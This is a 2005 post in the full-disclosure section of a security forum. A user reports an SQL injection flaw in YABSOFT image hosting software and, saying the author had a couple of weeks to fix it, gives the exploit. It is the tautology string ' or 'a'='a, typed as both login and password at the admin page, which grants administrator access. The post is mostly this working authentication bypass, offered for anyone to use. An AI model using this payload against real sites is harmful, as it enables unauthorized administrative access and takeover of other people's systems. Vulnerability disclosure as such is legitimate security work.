|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 60
Members: 0
Total: 60
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
YABSOFT advanced image hosting software |
|
Posted: Thu Dec 01, 2005 3:07 am |
|
|
punkd |
Beginner |
|
|
Joined: Feb 28, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
just discovered a new bug in this software gives you admin by simple sql injection. I gave the author a couple weeks.. still havnt seen a new version so heres the exploit
goto
site.com/admin
use this for the login AND the password
' or 'a'='a
and you have admin. Lots of other stuff you can do but I wont go into detail. |
|
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|